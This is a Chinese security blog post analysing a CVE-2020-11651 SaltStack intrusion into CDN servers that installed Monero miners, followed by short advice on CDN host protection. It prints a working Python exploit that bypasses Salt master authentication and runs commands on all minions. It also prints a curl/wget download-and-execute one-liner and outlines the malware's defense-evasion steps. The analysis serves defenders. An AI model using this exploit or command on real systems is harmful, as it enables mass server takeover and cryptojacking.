0x00、前言
今天通過(guò)SaltStack漏洞這個(gè)藥引子,聊聊CDN網(wǎng)絡(luò)安全防護(hù)這個(gè)話題。先聊聊,CDN定義:Content Delivery Network,內(nèi)容分發(fā)網(wǎng)絡(luò),給用戶帶來(lái)的價(jià)值,加速獲得其靜態(tài)或者動(dòng)態(tài)內(nèi)容,典型的應(yīng)用場(chǎng)景,360安全衛(wèi)士中的軟件安裝,后臺(tái)使用的就CDN網(wǎng)絡(luò)。在比如目前比較火的抖音短視頻,用戶在某個(gè)地方上傳視頻后,幾億的用戶都可以快速看到,很難想象,如果這個(gè)短視頻在一臺(tái)服務(wù)器上,幾千萬(wàn)人同時(shí)去下載,網(wǎng)絡(luò)堵塞延遲會(huì)多大?
再聊聊SaltStack,是一個(gè)服務(wù)器基礎(chǔ)架構(gòu)集中化管理平臺(tái),幾分鐘之內(nèi)就可以運(yùn)行起來(lái),速度特別快,服務(wù)器之間秒級(jí)通訊,擴(kuò)展性好,很容易批量管理上萬(wàn)臺(tái)服務(wù)器,顯著的降低人力與運(yùn)維成本。它是簡(jiǎn)化版的puppet,saltstack基于Python語(yǔ)言實(shí)現(xiàn),結(jié)合輕量級(jí)消息隊(duì)列(ZeroMQ),Python第三方模塊(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)構(gòu)建,SaltStack是一套C/S架構(gòu)的運(yùn)維工具,服務(wù)端口默認(rèn)為4505/4506,兩個(gè)端口如果對(duì)外網(wǎng)開(kāi)放危害非常大。
目前商業(yè)化的CDN絕大部分都在使用SaltStack做軟件分發(fā)系統(tǒng)。黑客利用SaltStack的遠(yuǎn)程命令執(zhí)行漏洞CVE-2020-11651可以直接繞過(guò)Salt-Master的認(rèn)證機(jī)制,調(diào)用相關(guān)函數(shù)向Salt-Minion下發(fā)指令執(zhí)行系統(tǒng)命令,最終導(dǎo)致挖礦。
0x01、攻擊詳情
1、通過(guò)網(wǎng)絡(luò)空間搜索引擎https://www.shodan.io/等獲取 外網(wǎng)開(kāi)發(fā)SaltStack master的主機(jī)列表。
2、通過(guò)cve-2020-11651.py批量執(zhí)行,下載sa.sh腳本。獲取到master key,在幾分鐘內(nèi)就會(huì)吧命令傳遞到cdn服務(wù)器連接的client,*山云大約有幾千臺(tái)機(jī)器就是這么感染的。(curl -s x.x.x.x/sa.sh||wget -q -O- x.x.x.x/sa.sh)|sh
def ping_master():
print("Attempting to ping master at "+master_ip)
try:
msg = {"cmd":"ping"}
response = clear_channel.send(msg, timeout=3)
if response:
return True
except salt.exceptions.SaltReqTimeoutError:
return False
return False
def get_rootkey():
try:
response = clear_channel.send({'cmd':'_prep_auth_info'}, timeout=2)
for i in response:
if isinstance(i,dict) and len(i) == 1:
rootkey = list(i.values())[0]
print("Retrieved root key: " + rootkey)
return rootkey
return False
except:
return False
def send_command_to_minions(command):
print("Sending command to all minions on master")
jid = "{0:%Y%m%d%H%M%S%f}".format(datetime.datetime.utcnow())
cmd = "/bin/sh -c '{0}'".format(command)
msg = {'cmd':"_send_pub","fun":"cmd.run","arg":[cmd],"tgt":"*","ret":"","tgt_type":"glob","user":"root","jid":jid}
try:
response = clear_channel.send(msg,timeout=3)
if response == None:
return True
else:
return False
except:
return False
def master_shell(root_key,command):
msg = {"key":root_key,
"cmd":"runner",
'fun': 'salt.cmd',
"kwarg":{
"fun":"cmd.exec_code",
"lang":"python3",
"code":"import subprocess;subprocess.call('{}',shell=True)".format(command)
},
'jid': '20200504042611133934',
'user': 'sudo_user',
'_stamp': '2020-05-04T04:26:13.609688'}
try:
response = clear_channel.send(msg,timeout=3)
print("Got response for attempting master shell: "+str(response)+ ". Looks promising!")
return True
except:
print("something failed")
return False
if __name__=="__main__":
if len(sys.argv) <= 2:
print("Not enough args")
print("Use like python3 cve-2020-11651.py)
sys.exit(1)
target = sys.argv[1]
master_minion_root = sys.argv[2]
master_ip = target
master_port = '4506'
minion_config = {
'transport': 'zeromq',
'pki_dir': '/tmp',
'id': 'root',
'log_level': 'debug',
'master_ip': master_ip,
'master_port': master_port,
'auth_timeout': 5,
'auth_tries': 1,
'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)
}
clear_channel = salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')
if not ping_master():
print("Failed to ping the specified master server, exiting")
sys.exit(1)
if master_minion_root == "master" or master_minion_root == "minions":
command = sys.argv[3]
rootkey = get_rootkey()
if not rootkey:
print("Failed to fetch the root key from the instance. This MAY indicate that it is patched")
sys.exit(1)
else:
if master_minion_root == "master":
master_shell(rootkey,command)
else:
send_command_to_minions(command)
elif master_minion_root == "fetchkeyonly":
get_rootkey()
else:
print("Invalid usage")
3、執(zhí)行sa.sh做以下操作:
@1、關(guān)閉防火墻、設(shè)置ulimit、系統(tǒng)syslog日志刪除、設(shè)置tmp目錄權(quán)限關(guān)閉watchdog,設(shè)置ssh共喲啊文件權(quán)限,清理tmp目錄等。
@2、干掉安騎士,云鏡(用齊自身卸載腳本操作),看來(lái)阿里云和騰訊云的CDN網(wǎng)絡(luò)受到嚴(yán)重的摧殘,也說(shuō)明黑客分子在不斷的進(jìn)化當(dāng)中,因?yàn)楹芏鄷r(shí)候,這種下載腳本在本機(jī)上有主機(jī)安全軟件的情況下,都是無(wú)效的。
@3、清理cpu資源占用超過(guò)10%的進(jìn)程,保證有更多的硬件資源可以挖礦。也間接終止其他挖礦進(jìn)程。同時(shí)清理docker形式運(yùn)行的挖礦進(jìn)程。
@4、然后下載salt-store,釋放出羅門(mén)幣挖礦進(jìn)程。
4、salt-store執(zhí)行以下操作
@1、使用masscan掃描redis服務(wù)器,二進(jìn)制分析
@2、樣本傳到virustotal上發(fā)現(xiàn)連接的連接C2地址(IP地址)。
由于3、4網(wǎng)上有很多分析,我就不在贅述,不過(guò)從整個(gè)入侵過(guò)程來(lái)看,黑客搞的這個(gè)腳本目的是短平快,C2更新使用的IP而非域名,這個(gè)有點(diǎn)low,但是他把挖礦程序開(kāi)足馬力,能挖多久就挖多久,門(mén)羅幣錢包為:
46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6Jv
VMuQwAXxLZmTWkb
這個(gè)羅門(mén)幣里面大約獲利400萬(wàn)左右。正好趕上五一期間,但是黑客顯然沒(méi)有運(yùn)維經(jīng)驗(yàn),CPU搞那么高,監(jiān)控肯定能發(fā)現(xiàn),大規(guī)模服務(wù)器出現(xiàn)CPU過(guò)高情況,肯定會(huì)有安全分析人員登錄服務(wù)器檢查。還有CDN會(huì)托管圖片等靜態(tài)資源,突然之間有超時(shí)的情況,也會(huì)引起重視的。估計(jì)4月30號(hào)開(kāi)掃描,挖到5月3號(hào)。還有估計(jì)也沒(méi)想到會(huì)有那么多CDN服務(wù)提供商中招。
0x02、CDN安全防護(hù)方案
針對(duì)CDN這種邊緣服務(wù),其實(shí)很難設(shè)計(jì)安全防護(hù)方案,因?yàn)?,CDN廠商為了節(jié)省資源,二級(jí)節(jié)點(diǎn)一般部署10臺(tái)二手服務(wù)器,處理帶寬40——80G。一級(jí)節(jié)點(diǎn)也就20臺(tái)服務(wù)器,做cache用。公有云CDN業(yè)務(wù)本身就是賠錢的買賣。你說(shuō)上一套具備縱深防護(hù)體系的安全解決方案是不現(xiàn)實(shí)的。個(gè)人覺(jué)得只要在物理服務(wù)器上安裝主機(jī)安全Agent就滿足需求了。有的CDN廠商還在CDN機(jī)房擴(kuò)建高防機(jī)房,復(fù)用帶寬,這種情況下,針對(duì)主機(jī)層面的網(wǎng)絡(luò)通訊流量,處理尤為重要。所以,主機(jī)安全Agent對(duì)網(wǎng)絡(luò)流量的監(jiān)控建議disable掉。主要能抓到挖礦進(jìn)程就好。